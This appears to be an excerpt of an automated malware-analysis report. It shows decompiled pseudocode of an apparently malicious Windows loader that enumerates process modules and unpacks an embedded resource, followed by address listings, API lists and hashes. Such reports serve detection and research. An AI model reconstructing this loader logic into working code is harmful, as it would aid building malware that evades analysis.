							_t457 = __imp__#9; // 0x76e3cf00
							 *_t457( &_v1160);
							__eflags = _t550 - _t542;
							if(_t550 != _t542) {
								_t409 = InterlockedDecrement(_t550 + 8);
								__eflags = _t409;
								if(_t409 == 0) {
									_t410 =  *_t550;
									__eflags = _t410 - _t542;
									if(_t410 != _t542) {
										__imp__#6(_t410);
									}
									_t411 =  *((intOrPtr*)(_t550 + 4));
									__eflags = _t411 - _t542;
									if(__eflags != 0) {
										_push(_t411);
										E0040AF8B(_t457, _t542, _t550, __eflags);
										_t568 = _t568 + 4;
									}
									E0040AE80(_t457, _t542, _t550, __eflags, _t550);
									_t568 = _t568 + 4;
								}
							}
							 *_t457( &_v1180);
							_t397 = _v1260;
							__eflags = _t397 - _t542;
							if(_t397 != _t542) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 8))))(_t397);
							}
							_t551 = _v1248;
							__eflags = _t551 - _t542;
							if(_t551 != _t542) {
								_t401 = InterlockedDecrement(_t551 + 8);
								__eflags = _t401;
								if(_t401 == 0) {
									_t402 =  *_t551;
									__eflags = _t402 - _t542;
									if(_t402 != _t542) {
										__imp__#6(_t402);
									}
									_t403 =  *((intOrPtr*)(_t551 + 4));
									__eflags = _t403 - _t542;
									if(__eflags != 0) {
										_push(_t403);
										E0040AF8B(_t457, _t542, _t551, __eflags);
										_t568 = _t568 + 4;
									}
									E0040AE80(_t457, _t542, _t551, __eflags, _t551);
								}
							}
							_t398 = _v1264;
							__eflags = _t398 - _t542;
							if(_t398 != _t542) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t398 + 8))))(_t398);
							}
						}
						_t372 = _v1140;
						__eflags = _t372 - _t542;
						if(_t372 != _t542) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t372 + 8))))(_t372);
						}
						_t373 = _v1136;
						__eflags = _t373 - _t542;
						if(_t373 != _t542) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t373 + 8))))(_t373);
						}
						goto L102;
					} else {
						_t440 = E00401650( &_v1092,  &_v980);
						_t570 = _t560 + 8;
						_t528 =  &_v528;
						while(1) {
							_t496 =  *_t528;
							if(_t496 !=  *_t440) {
								break;
							}
							if(_t496 == 0) {
								L7:
								_t440 = 0;
							} else {
								_t502 =  *((intOrPtr*)(_t528 + 1));
								if(_t502 !=  *((intOrPtr*)(_t440 + 1))) {
									break;
								} else {
									_t528 = _t528 + 2;
									_t440 = _t440 + 2;
									if(_t502 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t440 != 0) {
								_t442 = E00401650( &_v1164,  &_v1012);
								_t560 = _t570 + 8;
								_t497 =  &_v528;
								while(1) {
									_t530 =  *_t497;
									__eflags = _t530 -  *_t442;
									if(_t530 !=  *_t442) {
										break;
									}
									__eflags = _t530;
									if(_t530 == 0) {
										L16:
										_t442 = 0;
									} else {
										_t537 =  *((intOrPtr*)(_t497 + 1));
										__eflags = _t537 -  *((intOrPtr*)(_t442 + 1));
										if(_t537 !=  *((intOrPtr*)(_t442 + 1))) {
											break;
										} else {
											_t497 = _t497 + 2;
											_t442 = _t442 + 2;
											__eflags = _t537;
											if(_t537 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t442;
									if(_t442 == 0) {
										goto L10;
									} else {
										_t445 = Module32Next(_t544,  &_v560);
										__eflags = _t445;
										if(_t445 != 0) {
											do {
												_t447 = E00401650( &_v1096,  &_v984);
												_t571 = _t560 + 8;
												_t499 =  &_v532;
												while(1) {
													_t532 =  *_t499;
													__eflags = _t532 -  *_t447;
													if(_t532 !=  *_t447) {
														break;
													}
													__eflags = _t532;
													if(_t532 == 0) {
														L26:
														_t447 = 0;
													} else {
														_t536 =  *((intOrPtr*)(_t499 + 1));
														__eflags = _t536 -  *((intOrPtr*)(_t447 + 1));
														if(_t536 !=  *((intOrPtr*)(_t447 + 1))) {
															break;
														} else {
															_t499 = _t499 + 2;
															_t447 = _t447 + 2;
															__eflags = _t536;
															if(_t536 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t447;
													if(_t447 == 0) {
														goto L10;
													} else {
														_t448 = E00401650( &_v1168,  &_v1016);
														_t560 = _t571 + 8;
														_t501 =  &_v532;
														while(1) {
															_t534 =  *_t501;
															__eflags = _t534 -  *_t448;
															if(_t534 !=  *_t448) {
																break;
															}
															__eflags = _t534;
															if(_t534 == 0) {
																L34:
																_t448 = 0;
															} else {
																_t535 =  *((intOrPtr*)(_t501 + 1));
																__eflags = _t535 -  *((intOrPtr*)(_t448 + 1));
																if(_t535 !=  *((intOrPtr*)(_t448 + 1))) {
																	break;
																} else {
																	_t501 = _t501 + 2;
																	_t448 = _t448 + 2;
																	__eflags = _t535;
																	if(_t535 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t448;
															if(_t448 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L103;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L103;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t450 = Module32Next(_t544,  &_v564);
												__eflags = _t450;
											} while (_t450 != 0);
										}
										goto L38;
									}
									goto L103;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t544);
								return 0;
							}
							goto L103;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L103:
			}













































































































































































































                                                                                                            0x00401980
                                                                                                            0x00401980
                                                                                                            0x0040198c
                                                                                                            0x004019a1
                                                                                                            0x004019a6
                                                                                                            0x004019ab
                                                                                                            0x004019b0
                                                                                                            0x004019b5
                                                                                                            0x004019ba
                                                                                                            0x004019bf
                                                                                                            0x004019c4
                                                                                                            0x004019c9
                                                                                                            0x004019cd
                                                                                                            0x004019d2
                                                                                                            0x004019d7
                                                                                                            0x004019dc
                                                                                                            0x004019e1
                                                                                                            0x004019e6
                                                                                                            0x004019eb
                                                                                                            0x004019f0
                                                                                                            0x004019f5
                                                                                                            0x004019fa
                                                                                                            0x004019ff
                                                                                                            0x00401a04
                                                                                                            0x00401a09
                                                                                                            0x00401a0e
                                                                                                            0x00401a13
                                                                                                            0x00401a18
                                                                                                            0x00401a1d
                                                                                                            0x00401a22
                                                                                                            0x00401a27
                                                                                                            0x00401a2c
                                                                                                            0x00401a31
                                                                                                            0x00401a36
                                                                                                            0x00401a3b
                                                                                                            0x00401a40
                                                                                                            0x00401a4a
                                                                                                            0x00401a4b
                                                                                                            0x00401a50
                                                                                                            0x00401a58
                                                                                                            0x0040243c
                                                                                                            0x0040243c
                                                                                                            0x00402445
                                                                                                            0x00401a5e
                                                                                                            0x00401a67
                                                                                                            0x00401a73
                                                                                                            0x00401a77
                                                                                                            0x00401a82
                                                                                                            0x00401a87
                                                                                                            0x00401a8c
                                                                                                            0x00401a91
                                                                                                            0x00401a96
                                                                                                            0x00401a9b
                                                                                                            0x00401aa0
                                                                                                            0x00401aa5
                                                                                                            0x00401aaa
                                                                                                            0x00401aaf
                                                                                                            0x00401ab4
                                                                                                            0x00401ab9
                                                                                                            0x00401abe
                                                                                                            0x00401ac3
                                                                                                            0x00401ac8
                                                                                                            0x00401acd
                                                                                                            0x00401ad2
                                                                                                            0x00401ad7
                                                                                                            0x00401adc
                                                                                                            0x00401ae1
                                                                                                            0x00401ae6
                                                                                                            0x00401aeb
                                                                                                            0x00401af0
                                                                                                            0x00401af5
                                                                                                            0x00401afa
                                                                                                            0x00401aff
                                                                                                            0x00401b04
                                                                                                            0x00401b09
                                                                                                            0x00401b0e
                                                                                                            0x00401b13
                                                                                                            0x00401b18
                                                                                                            0x00401b1d
                                                                                                            0x00401b22
                                                                                                            0x00401b2a
                                                                                                            0x00401b2f
                                                                                                            0x00401b34
                                                                                                            0x00401b39
                                                                                                            0x00401b3e
                                                                                                            0x00401b43
                                                                                                            0x00401b48
                                                                                                            0x00401b4d
                                                                                                            0x00401b52
                                                                                                            0x00401b56
                                                                                                            0x00401b5b
                                                                                                            0x00401b60
                                                                                                            0x00401b65
                                                                                                            0x00401b6a
                                                                                                            0x00401b6f
                                                                                                            0x00401b74
                                                                                                            0x00401b79
                                                                                                            0x00401b7e
                                                                                                            0x00401b83
                                                                                                            0x00401b88
                                                                                                            0x00401b8d
                                                                                                            0x00401b92
                                                                                                            0x00401b97
                                                                                                            0x00401b9c
                                                                                                            0x00401ba1
                                                                                                            0x00401ba6
                                                                                                            0x00401bab
                                                                                                            0x00401bb0
                                                                                                            0x00401bb5
                                                                                                            0x00401bba
                                                                                                            0x00401bbf
                                                                                                            0x00401bc4
                                                                                                            0x00401bc9
                                                                                                            0x00401bce
                                                                                                            0x00401bd5
                                                                                                            0x00401d43
                                                                                                            0x00401d44
                                                                                                            0x00401d61
                                                                                                            0x00401d63
                                                                                                            0x00401d68
                                                                                                            0x00401d6d
                                                                                                            0x00401d72
                                                                                                            0x00401d77
                                                                                                            0x00401d7c
                                                                                                            0x00401d81
                                                                                                            0x00401d86
                                                                                                            0x00401d8b
                                                                                                            0x00401d90
                                                                                                            0x00401d95
                                                                                                            0x00401d9a
                                                                                                            0x00401d9f
                                                                                                            0x00401da4
                                                                                                            0x00401da9
                                                                                                            0x00401dae
                                                                                                            0x00401db3
                                                                                                            0x00401db8
                                                                                                            0x00401dbd
                                                                                                            0x00401dc2
                                                                                                            0x00401dc7
                                                                                                            0x00401dcc
                                                                                                            0x00401dd1
                                                                                                            0x00401dd6
                                                                                                            0x00401ddb
                                                                                                            0x00401de0
                                                                                                            0x00401de5
                                                                                                            0x00401dea
                                                                                                            0x00401def
                                                                                                            0x00401df4
                                                                                                            0x00401df9
                                                                                                            0x00401dfe
                                                                                                            0x00401e03
                                                                                                            0x00401e18
                                                                                                            0x00401e1c
                                                                                                            0x00401e26
                                                                                                            0x00401e31
                                                                                                            0x00401e3a
                                                                                                            0x00401e3f
                                                                                                            0x00401e44
                                                                                                            0x00401e46
                                                                                                            0x00401e4b
                                                                                                            0x00401e4e
                                                                                                            0x00401e52
                                                                                                            0x00401e54
                                                                                                            0x00401e70
                                                                                                            0x00401e56
                                                                                                            0x00401e5e
                                                                                                            0x00401e67
                                                                                                            0x00401e6a
                                                                                                            0x00401e6a
                                                                                                            0x00401e7c
                                                                                                            0x00401e81
                                                                                                            0x00401e87
                                                                                                            0x00401e8d
                                                                                                            0x00401e91
                                                                                                            0x00401e92
                                                                                                            0x00401e9a
                                                                                                            0x00401e9d
                                                                                                            0x00401e9f
                                                                                                            0x00401ea5
                                                                                                            0x00401ea9
                                                                                                            0x00401eb0
                                                                                                            0x00401ec0
                                                                                                            0x00401ec0
                                                                                                            0x00401ecd
                                                                                                            0x00401ed2
                                                                                                            0x00401ed7
                                                                                                            0x00401ed8
                                                                                                            0x00401edd
                                                                                                            0x00401ee5
                                                                                                            0x00401ee5
                                                                                                            0x00401ee5
                                                                                                            0x00401ee5
                                                                                                            0x00401ec0
                                                                                                            0x00401ef0
                                                                                                            0x00401ef0
                                                                                                            0x00401ef6
                                                                                                            0x00401eff
                                                                                                            0x00401eff
                                                                                                            0x00401eff
                                                                                                            0x00401f00
                                                                                                            0x00401f02
                                                                                                            0x00401f08
                                                                                                            0x00401f0a
                                                                                                            0x00401f0d
                                                                                                            0x00401f0e
                                                                                                            0x00401f13
                                                                                                            0x00401f13
                                                                                                            0x00401f15
                                                                                                            0x00401f16
                                                                                                            0x00401f16
                                                                                                            0x00401f23
                                                                                                            0x00401f2c
                                                                                                            0x00401f32
                                                                                                            0x00401f35
                                                                                                            0x00401f3c
                                                                                                            0x00401f4a
                                                                                                            0x00401f4c
                                                                                                            0x00401f53
                                                                                                            0x00401f60
                                                                                                            0x00401f6d
                                                                                                            0x00401f7f
                                                                                                            0x00401f7f
                                                                                                            0x00401f82
                                                                                                            0x00401f87
                                                                                                            0x00401f8c
                                                                                                            0x00401f91
                                                                                                            0x00401f96
                                                                                                            0x00401f9b
                                                                                                            0x00401fa0
                                                                                                            0x00401fa5
                                                                                                            0x00401faa
                                                                                                            0x00401faf
                                                                                                            0x00401fb4
                                                                                                            0x00401fb9
                                                                                                            0x00401fbe
                                                                                                            0x00401fc3
                                                                                                            0x00401fc8
                                                                                                            0x00401fcd
                                                                                                            0x00401fd2
                                                                                                            0x00401fd7
                                                                                                            0x00401fdc
                                                                                                            0x00401fe1
                                                                                                            0x00401fe6
                                                                                                            0x00401feb
                                                                                                            0x00401ff0
                                                                                                            0x00401ff5
                                                                                                            0x00401ffa
                                                                                                            0x00401fff
                                                                                                            0x00402004
                                                                                                            0x00402009
                                                                                                            0x0040200e
                                                                                                            0x00402013
                                                                                                            0x00402018
                                                                                                            0x0040201d
                                                                                                            0x00402022
                                                                                                            0x00402030
                                                                                                            0x00402038
                                                                                                            0x0040203d
                                                                                                            0x00402042
                                                                                                            0x00402047
                                                                                                            0x0040204c
                                                                                                            0x00402051
                                                                                                            0x00402056
                                                                                                            0x0040205b
                                                                                                            0x0040206d
                                                                                                            0x00402072
                                                                                                            0x00402077
                                                                                                            0x0040207c
                                                                                                            0x00402081
                                                                                                            0x00402086
                                                                                                            0x0040208b
                                                                                                            0x00402090
                                                                                                            0x00402095
                                                                                                            0x0040209a
                                                                                                            0x0040209f
                                                                                                            0x004020a4
                                                                                                            0x004020a9
                                                                                                            0x004020ae
                                                                                                            0x004020b3
                                                                                                            0x004020b8
                                                                                                            0x004020bd
                                                                                                            0x004020c2
                                                                                                            0x004020c7
                                                                                                            0x004020cc
                                                                                                            0x004020d1
                                                                                                            0x004020d6
                                                                                                            0x004020db
                                                                                                            0x004020e0
                                                                                                            0x004020e5
                                                                                                            0x004020ea
                                                                                                            0x004020ef
                                                                                                            0x004020fa
                                                                                                            0x004020ff
                                                                                                            0x00402112
                                                                                                            0x00402119
                                                                                                            0x0040211d
                                                                                                            0x00402121
                                                                                                            0x00402126
                                                                                                            0x0040212d
                                                                                                            0x00402136
                                                                                                            0x00402137
                                                                                                            0x0040213c
                                                                                                            0x00402141
                                                                                                            0x00402142
                                                                                                            0x00402147
                                                                                                            0x0040214c
                                                                                                            0x00402151
                                                                                                            0x00402153
                                                                                                            0x004021c3
                                                                                                            0x004021c3
                                                                                                            0x00000000
                                                                                                            0x00402155
                                                                                                            0x00402155
                                                                                                            0x0040215f
                                                                                                            0x00402161
                                                                                                            0x00402163
                                                                                                            0x004021c5
                                                                                                            0x004021c5
                                                                                                            0x00402165
                                                                                                            0x00402165
                                                                                                            0x00402169
                                                                                                            0x0040216b
                                                                                                            0x00402173
                                                                                                            0x00402173
                                                                                                            0x00402175
                                                                                                            0x0040217d
                                                                                                            0x00402188
                                                                                                            0x0040218a
                                                                                                            0x0040218e
                                                                                                            0x00402190
                                                                                                            0x00402197
                                                                                                            0x00402197
                                                                                                            0x0040219c
                                                                                                            0x004021a0
                                                                                                            0x004021a2
                                                                                                            0x004021aa
                                                                                                            0x004021aa
                                                                                                            0x004021b1
                                                                                                            0x004021bf
                                                                                                            0x004021bf
                                                                                                            0x00402163
                                                                                                            0x004021ca
                                                                                                            0x004021d8
                                                                                                            0x004021da
                                                                                                            0x004021dc
                                                                                                            0x004021dd
                                                                                                            0x004021e2
                                                                                                            0x004021e2
                                                                                                            0x004021e5
                                                                                                            0x004021ea
                                                                                                            0x004021f9
                                                                                                            0x004021fd
                                                                                                            0x00402202
                                                                                                            0x00402210
                                                                                                            0x00402214
                                                                                                            0x00402222
                                                                                                            0x0040222f
                                                                                                            0x00402238
                                                                                                            0x0040223d
                                                                                                            0x00402241
                                                                                                            0x00402245
                                                                                                            0x0040224f
                                                                                                            0x00402253
                                                                                                            0x00402257
                                                                                                            0x00402264
                                                                                                            0x00402269
                                                                                                            0x0040226d
                                                                                                            0x00402273
                                                                                                            0x00402277
                                                                                                            0x00402279
                                                                                                            0x00402280
                                                                                                            0x00402280
                                                                                                            0x00402285
                                                                                                            0x00402287
                                                                                                            0x0040228b
                                                                                                            0x0040228d
                                                                                                            0x00402295
                                                                                                            0x00402295
                                                                                                            0x0040229c
                                                                                                            0x004022aa
                                                                                                            0x004022ac
                                                                                                            0x004022ae
                                                                                                            0x004022b1
                                                                                                            0x004022b1
                                                                                                            0x004022b7
                                                                                                            0x004022bb
                                                                                                            0x004022bd
                                                                                                            0x004022c4
                                                                                                            0x004022c4
                                                                                                            0x004022c9
                                                                                                            0x004022cd
                                                                                                            0x004022cf
                                                                                                            0x004022d7
                                                                                                            0x004022d7
                                                                                                            0x004022d9
                                                                                                            0x004022dd
                                                                                                            0x004022e1
                                                                                                            0x004022e3
                                                                                                            0x004022e9
                                                                                                            0x004022e9
                                                                                                            0x004022e5
                                                                                                            0x004022e5
                                                                                                            0x004022e5
                                                                                                            0x004022f7
                                                                                                            0x004022fd
                                                                                                            0x00402303
                                                                                                            0x00402307
                                                                                                            0x00402309
                                                                                                            0x00402310
                                                                                                            0x00402310
                                                                                                            0x00402315
                                                                                                            0x0040231c
                                                                                                            0x0040231e
                                                                                                            0x00402324
                                                                                                            0x00402324
                                                                                                            0x00402320
                                                                                                            0x00402320
                                                                                                            0x00402320
                                                                                                            0x00402338
                                                                                                            0x0040233b
                                                                                                            0x0040233d
                                                                                                            0x00402347
                                                                                                            0x00402356
                                                                                                            0x00402368
                                                                                                            0x0040236b
                                                                                                            0x0040236d
                                                                                                            0x0040237b
                                                                                                            0x00402383
                                                                                                            0x00402385
                                                                                                            0x0040238b
                                                                                                            0x0040238d
                                                                                                            0x0040238f
                                                                                                            0x00402391
                                                                                                            0x00402393
                                                                                                            0x00402395
                                                                                                            0x00402398
                                                                                                            0x00402398
                                                                                                            0x0040239e
                                                                                                            0x004023a1
                                                                                                            0x004023a3
                                                                                                            0x004023a5
                                                                                                            0x004023a6
                                                                                                            0x004023ab
                                                                                                            0x004023ab
                                                                                                            0x004023af
                                                                                                            0x004023b4
                                                                                                            0x004023b4
                                                                                                            0x0040238f
                                                                                                            0x004023bf
                                                                                                            0x004023c1
                                                                                                            0x004023c5
                                                                                                            0x004023c7
                                                                                                            0x004023cf
                                                                                                            0x004023cf
                                                                                                            0x004023d1
                                                                                                            0x004023d5
                                                                                                            0x004023d7
                                                                                                            0x004023dd
                                                                                                            0x004023df
                                                                                                            0x004023e1
                                                                                                            0x004023e3
                                                                                                            0x004023e5
                                                                                                            0x004023e7
                                                                                                            0x004023ea
                                                                                                            0x004023ea
                                                                                                            0x004023f0
                                                                                                            0x004023f3
                                                                                                            0x004023f5
                                                                                                            0x004023f7
                                                                                                            0x004023f8
                                                                                                            0x004023fd
                                                                                                            0x004023fd
                                                                                                            0x00402401
                                                                                                            0x00402406
                                                                                                            0x004023e1
                                                                                                            0x00402409
                                                                                                            0x0040240d
                                                                                                            0x0040240f
                                                                                                            0x00402417
                                                                                                            0x00402417
                                                                                                            0x0040240f
                                                                                                            0x00402419
                                                                                                            0x0040241d
                                                                                                            0x0040241f
                                                                                                            0x00402427
                                                                                                            0x00402427
                                                                                                            0x00402429
                                                                                                            0x0040242d
                                                                                                            0x0040242f
                                                                                                            0x00402437
                                                                                                            0x00402437
                                                                                                            0x00000000
                                                                                                            0x00401bdb
                                                                                                            0x00401be8
                                                                                                            0x00401bed
                                                                                                            0x00401bf0
                                                                                                            0x00401bf7
                                                                                                            0x00401bf7
                                                                                                            0x00401bfb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401bff
                                                                                                            0x00401c13
                                                                                                            0x00401c13
                                                                                                            0x00401c01
                                                                                                            0x00401c01
                                                                                                            0x00401c07
                                                                                                            0x00000000
                                                                                                            0x00401c09
                                                                                                            0x00401c09
                                                                                                            0x00401c0c
                                                                                                            0x00401c11
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401c11
                                                                                                            0x00401c07
                                                                                                            0x00401c1c
                                                                                                            0x00401c1e
                                                                                                            0x00401c41
                                                                                                            0x00401c46
                                                                                                            0x00401c49
                                                                                                            0x00401c50
                                                                                                            0x00401c50
                                                                                                            0x00401c52
                                                                                                            0x00401c54
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401c56
                                                                                                            0x00401c58
                                                                                                            0x00401c6c
                                                                                                            0x00401c6c
                                                                                                            0x00401c5a
                                                                                                            0x00401c5a
                                                                                                            0x00401c5d
                                                                                                            0x00401c60
                                                                                                            0x00000000
                                                                                                            0x00401c62
                                                                                                            0x00401c62
                                                                                                            0x00401c65
                                                                                                            0x00401c68
                                                                                                            0x00401c6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401c6a
                                                                                                            0x00401c60
                                                                                                            0x00401c75
                                                                                                            0x00401c75
                                                                                                            0x00401c77
                                                                                                            0x00000000
                                                                                                            0x00401c79
                                                                                                            0x00401c82
                                                                                                            0x00401c87
                                                                                                            0x00401c89
                                                                                                            0x00401c90
                                                                                                            0x00401c9d
                                                                                                            0x00401ca2
                                                                                                            0x00401ca5
                                                                                                            0x00401cb0
                                                                                                            0x00401cb0
                                                                                                            0x00401cb2
                                                                                                            0x00401cb4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401cb6
                                                                                                            0x00401cb8
                                                                                                            0x00401ccc
                                                                                                            0x00401ccc
                                                                                                            0x00401cba
                                                                                                            0x00401cba
                                                                                                            0x00401cbd
                                                                                                            0x00401cc0
                                                                                                            0x00000000
                                                                                                            0x00401cc2
                                                                                                            0x00401cc2
                                                                                                            0x00401cc5
                                                                                                            0x00401cc8
                                                                                                            0x00401cca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401cca
                                                                                                            0x00401cc0
                                                                                                            0x00401cd5
                                                                                                            0x00401cd5
                                                                                                            0x00401cd7
                                                                                                            0x00000000
                                                                                                            0x00401cdd
                                                                                                            0x00401cea
                                                                                                            0x00401cef
                                                                                                            0x00401cf2
                                                                                                            0x00401d00
                                                                                                            0x00401d00
                                                                                                            0x00401d02
                                                                                                            0x00401d04
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401d06
                                                                                                            0x00401d08
                                                                                                            0x00401d1c
                                                                                                            0x00401d1c
                                                                                                            0x00401d0a
                                                                                                            0x00401d0a
                                                                                                            0x00401d0d
                                                                                                            0x00401d10
                                                                                                            0x00000000
                                                                                                            0x00401d12
                                                                                                            0x00401d12
                                                                                                            0x00401d15
                                                                                                            0x00401d18
                                                                                                            0x00401d1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401d1a
                                                                                                            0x00401d10
                                                                                                            0x00401d25
                                                                                                            0x00401d25
                                                                                                            0x00401d27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401d27
                                                                                                            0x00401d20
                                                                                                            0x00401d22
                                                                                                            0x00000000
                                                                                                            0x00401d22
                                                                                                            0x00000000
                                                                                                            0x00401cd7
                                                                                                            0x00401cd0
                                                                                                            0x00401cd2
                                                                                                            0x00000000
                                                                                                            0x00401d2d
                                                                                                            0x00401d36
                                                                                                            0x00401d3b
                                                                                                            0x00401d3b
                                                                                                            0x00401c90
                                                                                                            0x00000000
                                                                                                            0x00401c89
                                                                                                            0x00000000
                                                                                                            0x00401c77
                                                                                                            0x00401c70
                                                                                                            0x00401c72
                                                                                                            0x00000000
                                                                                                            0x00401c20
                                                                                                            0x00401c20
                                                                                                            0x00401c21
                                                                                                            0x00401c33
                                                                                                            0x00401c33
                                                                                                            0x00000000
                                                                                                            0x00401c1e
                                                                                                            0x00401c17
                                                                                                            0x00401c19
                                                                                                            0x00000000
                                                                                                            0x00401c19
                                                                                                            0x00401bd5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040198C
                                                                                                            • _getenv.LIBCMT ref: 00401A4B
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401A5E
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00401A67
                                                                                                            • Module32First.KERNEL32 ref: 00401BCE
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C21
                                                                                                            • Module32Next.KERNEL32 ref: 00401C82
                                                                                                            • Module32Next.KERNEL32 ref: 00401D36
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401D44
                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401D4C
                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E12
                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401E29
                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E33
                                                                                                            • _malloc.LIBCMT ref: 00401E3A
                                                                                                            • _memset.LIBCMT ref: 00401E5E
                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$0x1$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$e$h$o$o$o$u$v$v$v$v$v2.0.50727$wks$x$x$x$x${${${${
                                                                                                            • API String ID: 2366190142-2844197788
                                                                                                            • Opcode ID: db7e48712f1aa88313612955b583e1fdaa3bc13a448d675983b8ecceb41f5a87
                                                                                                            • Instruction ID: 06cd9fd9dd9691a4cef85659ff1c2b68883106d479d5a1e127a1e26792eb73f0
                                                                                                            • Opcode Fuzzy Hash: db7e48712f1aa88313612955b583e1fdaa3bc13a448d675983b8ecceb41f5a87
                                                                                                            • Instruction Fuzzy Hash: 4E728B3000C7C19AD321DB388888A5BBFD59FA6318F484A5DF1E49B2E2D779D509C76B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401EB6, Relevance: 87.9, APIs: 22, Strings: 28, Instructions: 426libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E00401EB6(void* __ebx, intOrPtr* __edi, void* __eflags, char _a4, char _a5, char _a6, char _a7, char _a8, char _a9, char _a10, char _a11, char _a12, char _a13, char _a14, char _a15, char _a16, char _a17, char _a18, char _a19, void* _a20, char _a21, char _a22, char _a23, void* _a24, char _a25, char _a26, char _a27, char _a28, char _a29, char _a30, char _a31, void* _a32, char _a33, char _a34, char _a35, char _a36, intOrPtr _a40, char _a43, intOrPtr _a44, signed int _a48, char _a52, char _a56, char _a60, struct HRSRC__* _a64, intOrPtr _a68, intOrPtr _a80, void* _a84, intOrPtr* _a88, char _a96, char _a104, char _a112, char _a120, intOrPtr _a128, char _a220, char _a252, intOrPtr _a324, char _a328, char _a348, char _a352) {
				intOrPtr* _v8;
				char _v12;
				char _v20;
				intOrPtr* _v24;
				intOrPtr* _v44;
				intOrPtr* _v80;
				intOrPtr* _v92;
				intOrPtr* _v96;
				void* __esi;
				void* __ebp;
				intOrPtr _t165;
				intOrPtr* _t170;
				long _t171;
				struct HINSTANCE__* _t177;
				CHAR* _t178;
				void* _t181;
				intOrPtr _t182;
				intOrPtr* _t183;
				intOrPtr* _t184;
				void* _t192;
				intOrPtr* _t195;
				intOrPtr* _t196;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr _t201;
				intOrPtr* _t205;
				intOrPtr* _t209;
				intOrPtr* _t210;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t222;
				intOrPtr _t223;
				intOrPtr* _t231;
				void* _t233;
				intOrPtr* _t234;
				intOrPtr* _t235;
				intOrPtr* _t238;
				void* _t245;
				void* _t248;
				char _t249;
				intOrPtr* _t252;
				intOrPtr* _t254;
				signed int _t259;
				intOrPtr* _t273;
				intOrPtr _t296;
				intOrPtr* _t307;
				char _t309;
				void* _t311;
				intOrPtr* _t312;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				intOrPtr* _t317;
				intOrPtr* _t318;
				struct HINSTANCE__* _t319;
				void* _t320;
				void* _t327;
				intOrPtr* _t331;
				void* _t333;

				_t307 = __edi;
				_t248 = __ebx;
				do {
					_t165 = _a80;
					_push(_a128 + _t165);
					_push(0x400);
					_push(_t165);
					E00401560(__ebx, _a56);
					_a68 = _a68 + 0x400;
					_t6 =  &_a60;
					 *_t6 = _a60 - 1;
				} while ( *_t6 != 0);
				_t259 = _a48 & 0x800003ff;
				if(_t259 < 0) {
					_t259 = (_t259 - 0x00000001 | 0xfffffc00) + 1;
				}
				if(_t259 > 0) {
					_t245 = _a48 - _t259;
					_t286 = _t245 + _t307;
					_push(_t245 + _t307);
					_push(_t259);
					_push(_t245 + _t248);
					E00401560(_t248, _a44);
				}
				E0040B9F0(_t307, _t248, 0, _a48);
				FreeResource(_t311);
				_t249 =  *_t307;
				_a120 = _t249;
				_t170 = E0040B80D(_t249, _t286, _t307, _t249); // executed
				_t312 = _t170;
